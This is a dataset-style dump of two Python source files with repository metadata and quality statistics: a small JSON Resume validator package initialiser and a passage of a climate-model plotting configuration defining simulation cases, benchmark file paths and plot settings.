hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a73131170f5bdfaf1161caf237d671d9dbf5663d | 253 | py | Python | jsonresume/__init__.py | kelvintaywl/jsonresume-validator | 73ac162cb30ca70699c942def629188f7dfd4d3c | [
"MIT"
] | 42 | 2016-06-03T18:17:24.000Z | 2021-12-09T04:13:14.000Z | jsonresume/__init__.py | kelvintaywl/jsonresume-validator | 73ac162cb30ca70699c942def629188f7dfd4d3c | [
"MIT"
] | 3 | 2016-04-27T12:32:41.000Z | 2020-09-29T16:43:35.000Z | jsonresume/__init__.py | kelvintaywl/jsonresume-validator | 73ac162cb30ca70699c942def629188f7dfd4d3c | [
"MIT"
] | 9 | 2016-05-08T15:31:53.000Z | 2021-04-28T09:17:47.000Z | # -*- coding: utf-8 -*-
"""
JSON Resume Validator
~~~~~~
JSON Resume Validator helps validate python dictionaries to
ensure they are valid representation of a JSON Resume.
"""
from jsonresume.resume import Resume
__all__ = ['Resume']
| 19.461538 | 63 | 0.675889 | 30 | 253 | 5.566667 | 0.733333 | 0.179641 | 0.227545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005025 | 0.213439 | 253 | 12 | 64 | 21.083333 | 0.834171 | 0.660079 | 0 | 0 | 0 | 0 | 0.096774 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
a739bd10614848db1a73028a77c6c885008e1463 | 63,679 | py | Python | postprocessing/pyplotgen/config/Case_definitions.py | larson-group/clubb_release | b4d671e3e238dbe00752c0dead6a0d4f9897350a | [
"Intel",
"Unlicense",
"NetCDF"
] | null | null | null | postprocessing/pyplotgen/config/Case_definitions.py | larson-group/clubb_release | b4d671e3e238dbe00752c0dead6a0d4f9897350a | [
"Intel",
"Unlicense",
"NetCDF"
] | null | null | null | postprocessing/pyplotgen/config/Case_definitions.py | larson-group/clubb_release | b4d671e3e238dbe00752c0dead6a0d4f9897350a | [
"Intel",
"Unlicense",
"NetCDF"
] | 1 | 2022-01-28T22:22:04.000Z | 2022-01-28T22:22:04.000Z | """
:author: Nicolas Strike
:date: Early 2019
This file is mostly a definition of Cases. Each case is defined in the following format
using python dictionaries (values surrounded with < > must have the < > removed to be valid).
.. code-block:: python
:linenos:
CASENAME = {'name': 'casename',
'description': "",
'start_time': <numeric value>, 'end_time': <numeric value>,
'height_min_value': <numeric value>, 'height_max_value': <numeric value>,
'blacklisted_vars': ['list', 'of', 'variable', 'names', 'to', 'exclude', 'from', 'plotting'],
'sam_benchmark_file': <path to sam file>",
'clubb_file': {'zm': <path to file>,
'zt': <path to file>,
'sfc': <path to file>},
'coamps_benchmark_file': {'sm': <path to file>,
'sw': <path to file>},
'clubb_r408_benchmark_file': {'zm': <path to file>,
'zt': <path to file>,
'sfc': <path to file>},
'clubb_hoc_benchmark_file': {'zm': <path to file>',
'zt': <path to file>',
'sfc': <path to file>},
'e3sm_file': <path to file>,
'cam_file': <path to file>,
'sam_file': <path to file>,
'wrf_file': {'zm': <path to file>,
'zt': <path to file>,
'sfc': <path to file>},
'var_groups': [VariableGroupBase, <other variable groups to plot>]}
**Important note**:
When creating a new case, add it to the CASES_TO_PLOT list at the bottom of the file. Additionally, please add it in
alphabetical order.
**Case Definition values explained**:
*name*: must be the same as the filename without the extention.
E.g. to use lba_zt.nc and lba_zm.nc the case's name must be 'lba'. Extensions are determined
by the last instance of _
*start_time*: An integer value representing which timestep to begin the time-averaging interval.
Valid options are from 1 -> list minute value. Give in terms of clubb minutes.
*end_time*: An integer value representing which timestep to end the time-averaging interval.
Valid options are from 1 -> list minute value. Give in terms of clubb minutes.
Also used to determine where to stop timeseries plots
*height_min_value*: The elevation to begin height plots at
*height_max_value*: The elevation to end height plots at
*blacklisted_vars*: List of variables to avoid plotting for this case. Names must use the clubb-name version
*<model name>_file*: The path(s) to nc files for the given model.
(please use the <model name>_OUTPUT_ROOT variables as the beginning of the path).
*var_groups*: These are the groups of variables to be plotted for the given case. var_groups is defined as a
list of python class names, where the classes use the naming scheme VariableGroup____.py and define a variable
group. An example would be: 'var_groups': [VariableGroupBase, VariableGroupWs].
The variables inside a VariableGroup can be found in the file with the same name,
i.e. config/VariableGroupBase.py. An example would be thlm in VariableGroupBase.
"""
import os
from config.VariableGroupBase import VariableGroupBase
from config.VariableGroupCorrelations import VariableGroupCorrelations
from config.VariableGroupIceMP import VariableGroupIceMP
from config.VariableGroupKKMP import VariableGroupKKMP
from config.VariableGroupLiquidMP import VariableGroupLiquidMP
from config.VariableGroupSamProfiles import VariableGroupSamProfiles
from config.VariableGroupScalars import VariableGroupScalars
from config.VariableGroupWs import VariableGroupWs
from config.VariableGroupTaus import VariableGroupTaus
from config.VariableGroupNondimMoments import VariableGroupNondimMoments
from config.VariableGroupNormalizedVariations import VariableGroupNormalizedVariations
# ---------------------------
BENCHMARK_OUTPUT_ROOT = "/home/pub/les_and_clubb_benchmark_runs/"
if not os.path.isdir(BENCHMARK_OUTPUT_ROOT) and \
not os.path.islink(BENCHMARK_OUTPUT_ROOT):
print("Benchmark output was not found in " + BENCHMARK_OUTPUT_ROOT + ".\n\tChecking local location: " +
os.path.dirname(os.path.realpath(__file__)) + "/../les_and_clubb_benchmark_runs/")
BENCHMARK_OUTPUT_ROOT = os.path.dirname(os.path.realpath(__file__)) + "/../les_and_clubb_benchmark_runs/"
SAM_BENCHMARK_OUTPUT_ROOT = BENCHMARK_OUTPUT_ROOT + "sam_benchmark_runs"
COAMPS_BENCHMARK_OUTPUT_ROOT = BENCHMARK_OUTPUT_ROOT + "les_runs"
WRF_LASSO_BENCHMARK_OUTPUT_ROOT = BENCHMARK_OUTPUT_ROOT + "wrf_lasso_runs"
ARCHIVED_CLUBB_OUTPUT_ROOT = BENCHMARK_OUTPUT_ROOT + "archived_clubb_runs"
R408_OUTPUT_ROOT = BENCHMARK_OUTPUT_ROOT + ""
HOC_OUTPUT_ROOT = BENCHMARK_OUTPUT_ROOT + "HOC_20051217"
# This folder is passed in as a command line parameter
# It is not capitalized because it is not intended to
# be final, i.e. is changed depending on the cmd line arg
e3sm_output_root = ""
sam_output_root = ""
wrf_output_root = ""
cam_output_root = ""
clubb_output_root = ""
# ---------------------------
# These are all the names that represent the height variable within different models
HEIGHT_VAR_NAMES = ['z', 'Z3', 'altitude', 'lev', 'CSP_Zm', 'CSP_Z8Wm'] # CSP_* added for WRF-LASSO cases
TIME_VAR_NAMES = ['time', 'XTIME']
"""
To plot only a subset of cases, reguardless of what output exists
in the clubb folder, uncomment the last line of this file and
fill that array with the cases you'd like to plot. This overwrites the
CASES_TO_PLOT variable such that pyplotgen will only know about cases in that
list and ignore all others. The name must match the python variable name
below (all caps).
For example, to plot only bomex and fire:
CASES_TO_PLOT = [BOMEX, FIRE]
"""
ARM = {'name': 'arm',
'description': "Output may differ from plotgen in some models (e.g. WRF) due to a difference in the time "
"averaging interval.",
'start_time': 481, 'end_time': 540,
'height_min_value': 0, 'height_max_value': 3500,
'blacklisted_vars': ['radht'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/ARM_96x96x110/GCSSARM_96x96x110_67m_40m_1s.nc"},
'clubb_file': {'zm': clubb_output_root + '/arm_zm.nc',
'zt': clubb_output_root + '/arm_zt.nc',
'sfc': clubb_output_root + '/arm_sfc.nc'},
'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/arm_coamps_sm.nc",
'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/arm_coamps_sw.nc"},
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/arm_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/arm_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/arm_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/arm_zm.nc',
'zt': HOC_OUTPUT_ROOT + '/arm_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/arm_sfc.nc'},
'e3sm_file': { 'e3sm': e3sm_output_root + "/arm.nc"},
'cam_file': None,
'sam_file': {'sam': sam_output_root + "/GCSSARM_96x96x110_67m_40m_1s.nc"},
'wrf_file': {'zm': wrf_output_root + "/arm_zm_wrf.nc",
'zt': wrf_output_root + "/arm_zt_wrf.nc",
'sfc': wrf_output_root + "/arm_sfc_wrf.nc"
},
'var_groups': [VariableGroupBase, VariableGroupWs]}
ARM_97 = {'name': 'arm_97',
'description': "",
'start_time': 4321, 'end_time': 5580,
'height_min_value': 0, 'height_max_value': 18000,
'blacklisted_vars': ['rtp3', 'Skrt_zt', 'Skthl_zt', 'thlp3', 'rtpthvp', 'thlpthvp'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/ARM97_r1315_128x128x128_1km_Morrison/ARM9707.nc"},
'clubb_file': {'zm': clubb_output_root + '/arm_97_zm.nc',
'zt': clubb_output_root + '/arm_97_zt.nc',
'sfc': clubb_output_root + '/arm_97_sfc.nc',
'subcolumns': clubb_output_root + '/arm_97_nl_lh_sample_points_2D.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': {'sam': sam_output_root + "/ARM9707_SAM_CLUBB.nc"},
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupIceMP]}
ASTEX_A209 = {'name': 'astex_a209',
'description': "",
'start_time': 2340, 'end_time': 2400,
'height_min_value': 0, 'height_max_value': 6000,
'blacklisted_vars': [],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/astex_a209_zm.nc',
'zt': clubb_output_root + '/astex_a209_zt.nc',
'sfc': clubb_output_root + '/astex_a209_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupCorrelations,
VariableGroupKKMP]}
ATEX = {'name': 'atex',
'description': "",
'start_time': 421, 'end_time': 480,
'height_min_value': 0, 'height_max_value': 2500,
'blacklisted_vars': [],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/atex_zm.nc',
'zt': clubb_output_root + '/atex_zt.nc',
'sfc': clubb_output_root + '/atex_sfc.nc'},
'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/atex_coamps_sm.nc",
'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/atex_coamps_sw.nc"},
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/atex_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/atex_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/atex_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/atex_zm.nc',
'zt': HOC_OUTPUT_ROOT + '/atex_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/atex_sfc.nc'},
'e3sm_file': None,
'cam_file': {'cam': cam_output_root + "/atex_cam.nc"},
'sam_file': None,
'wrf_file': {'zm': wrf_output_root + "/atex_zm_wrf.nc",
'zt': wrf_output_root + "/atex_zt_wrf.nc",
'sfc': wrf_output_root + "/atex_sfc_wrf.nc"
},
'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupIceMP]}
BOMEX = {'name': 'bomex',
'description': "",
'start_time': 181, 'end_time': 360,
'height_min_value': 0, 'height_max_value': 2500,
'blacklisted_vars': [],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/BOMEX_64x64x75/BOMEX_64x64x75_100m_40m_1s.nc"},
'clubb_file': {'zm': clubb_output_root + '/bomex_zm.nc',
'zt': clubb_output_root + '/bomex_zt.nc',
'sfc': clubb_output_root + '/bomex_sfc.nc'},
'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/bomex_coamps_sm.nc",
'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/bomex_coamps_sw.nc"},
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/bomex_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/bomex_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/bomex_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/bomex_zm.nc',
'zt': HOC_OUTPUT_ROOT + '/bomex_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/bomex_sfc.nc'},
'e3sm_file': { 'e3sm': e3sm_output_root + '/bomex.nc'},
'cam_file': None,
'sam_file': {'sam': sam_output_root + "/BOMEX_SAM_CLUBB.nc"},
'wrf_file': {'zm': wrf_output_root + '/bomex_zm_wrf.nc',
'zt': wrf_output_root + '/bomex_zt_wrf.nc',
'sfc': wrf_output_root + '/bomex_sfc_wrf.nc'},
'var_groups': [VariableGroupBase, VariableGroupWs]}
CGILS_S6 = {'name': 'cgils_s6',
'description': "",
'start_time': 12960, 'end_time': 14400,
'height_min_value': 0, 'height_max_value': 5950,
'blacklisted_vars': ['Ngm', 'rgm', 'Skrt_zt', 'Skthl_zt', 'thlp3',
'rtpthvp', 'thlpthvp', 'wprrp', 'wpNrp'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/SAM6.6/CLOUD_FEEDBACK_s6/ctl_s6_96x96x128_100m_DRZ_N100_tqndg.nc"},
'clubb_file': {'zm': clubb_output_root + '/cgils_s6_zm.nc',
'zt': clubb_output_root + '/cgils_s6_zt.nc',
'sfc': clubb_output_root + '/cgils_s6_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]}
CGILS_S11 = {'name': 'cgils_s11',
'description': "",
'start_time': 12960, 'end_time': 14400,
'height_min_value': 0, 'height_max_value': 5950,
'blacklisted_vars': ['Ngm', 'rgm', 'Skthl_zt', 'Skrt_zt', 'rtpthvp', 'thlpthvp', 'wprrp', 'wpNrp'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/SAM6.6/CLOUD_FEEDBACK_s11/ctl_s11_96x96x320_50m_DRZ_N100_ref.nc"},
'clubb_file': {'zm': clubb_output_root + '/cgils_s11_zm.nc',
'zt': clubb_output_root + '/cgils_s11_zt.nc',
'sfc': clubb_output_root + '/cgils_s11_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]}
CGILS_S12 = {'name': 'cgils_s12',
'description': "",
'start_time': 12960, 'end_time': 14400,
'height_min_value': 0, 'height_max_value': 5950,
'blacklisted_vars': ['Ngm', 'rgm', 'Skrt_zt', 'Skthl_zt', 'rtpthvp', 'thlpthvp', 'wprrp', 'wpNrp'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/SAM6.6/CLOUD_FEEDBACK_s12/ctl_s12_96x96x192_25m_DRZ_N100_fixnudge.nc"},
'clubb_file': {'zm': clubb_output_root + '/cgils_s12_zm.nc',
'zt': clubb_output_root + '/cgils_s12_zt.nc',
'sfc': clubb_output_root + '/cgils_s12_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]}
CLEX9_NOV02 = {'name': 'clex9_nov02',
'description': "",
'start_time': 181, 'end_time': 240,
'height_min_value': 4000, 'height_max_value': 6072,
'blacklisted_vars': ['Ngm'],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/clex9_nov02_zm.nc',
'zt': clubb_output_root + '/clex9_nov02_zt.nc',
'sfc': clubb_output_root + '/clex9_nov02_sfc.nc'},
'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/clex9_nov02_coamps_sm.nc",
'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/clex9_nov02_coamps_sw.nc"},
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]}
CLEX9_OCT14 = {'name': 'clex9_oct14',
'description': "",
'start_time': 181, 'end_time': 240,
'height_min_value': 2230, 'height_max_value': 6688,
'blacklisted_vars': ['Ngm'],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/clex9_oct14_zm.nc',
'zt': clubb_output_root + '/clex9_oct14_zt.nc',
'sfc': clubb_output_root + '/clex9_oct14_sfc.nc'},
'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/clex9_oct14_coamps_sm.nc",
'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/clex9_oct14_coamps_sw.nc"},
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]}
DYCOMS2_RF01 = {'name': 'dycoms2_rf01',
'description': "",
'start_time': 181, 'end_time': 240,
'height_min_value': 0, 'height_max_value': 1200,
'blacklisted_vars': [],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/DYCOMS_RF01_96x96x320/DYCOMS_RF01_96x96x320.nc"},
'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf01_zm.nc',
'zt': clubb_output_root + '/dycoms2_rf01_zt.nc',
'sfc': clubb_output_root + '/dycoms2_rf01_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf01_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf01_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf01_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf01_zm.nc',
'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf01_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf01_sfc.nc'},
'e3sm_file': { 'e3sm': e3sm_output_root + "/dycoms2_rf01.nc"},
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupWs]}
DYCOMS2_RF01_FIXED_SST = {'name': 'dycoms2_rf01_fixed_sst',
'description': "Copied from plotgen: Ran with a 5 min timestep and a 48-level grid",
'start_time': 2520, 'end_time': 2700,
'height_min_value': 0, 'height_max_value': 1200,
'blacklisted_vars': ['rtp3', 'Skrt_zt', 'Skthl_zt', 'rtpthvp', 'thlpthvp'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/SAM6.6/DYCOMS_RF01_fixed_sst/DYCOMS_RF01_96x96x320_LES_fixed_sst.nc"},
'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf01_fixed_sst_zm.nc',
'zt': clubb_output_root + '/dycoms2_rf01_fixed_sst_zt.nc',
'sfc': clubb_output_root + '/dycoms2_rf01_fixed_sst_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase]}
DYCOMS2_RF02_DO = {'name': 'dycoms2_rf02_do',
'description': "",
'start_time': 301, 'end_time': 360,
'height_min_value': 0, 'height_max_value': 1200,
'blacklisted_vars': [],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/DYCOMS_RF02_128x128x96_dr_nosed/DYCOMS_RF02_128x128x96_dr_nosed.nc"},
'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_do_zm.nc',
'zt': clubb_output_root + '/dycoms2_rf02_do_zt.nc',
'sfc': clubb_output_root + '/dycoms2_rf02_do_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_do_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_do_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_do_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_do_zm.nc',
'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_do_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_do_sfc.nc'},
'e3sm_file': None,
'cam_file': None,
'sam_file': {'sam': sam_output_root + "/DYCOMS_RF02_SAM_CLUBB.nc"},
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupCorrelations,
VariableGroupKKMP]}
DYCOMS2_RF02_DS = {'name': 'dycoms2_rf02_ds',
'description': "",
'start_time': 301, 'end_time': 360,
'height_min_value': 0, 'height_max_value': 1200,
'blacklisted_vars': [],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/DYCOMS_RF02_128x128x96_dr_sed/DYCOMS_RF02_128x128x96_dr_sed.nc"},
'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_ds_zm.nc',
'zt': clubb_output_root + '/dycoms2_rf02_ds_zt.nc',
'sfc': clubb_output_root + '/dycoms2_rf02_ds_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_zm.nc',
'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_sfc.nc'},
'e3sm_file': {'e3sm': e3sm_output_root + "/dycoms2_rf02_ds.nc"},
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupCorrelations,
VariableGroupKKMP]}
DYCOMS2_RF02_ND = {'name': 'dycoms2_rf02_nd',
'description': "Copied from plotgen: ** Generated by doing a restart run after 7200 seconds. Note: "
"t = 0 corresponds to start time of the restart run, not the original run. ** ",
'start_time': 301, 'end_time': 360,
'height_min_value': 0, 'height_max_value': 1200,
'blacklisted_vars': ['wprrp', 'wpNrp', 'corr_w_rr_1', 'corr_w_Nr_1'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/DYCOMS_RF02_128x128x96_nodr_nosed/DYCOMS_RF02_128x128x96_nodr_nosed.nc"},
'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_nd_zm.nc',
'zt': clubb_output_root + '/dycoms2_rf02_nd_zt.nc',
'sfc': clubb_output_root + '/dycoms2_rf02_nd_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
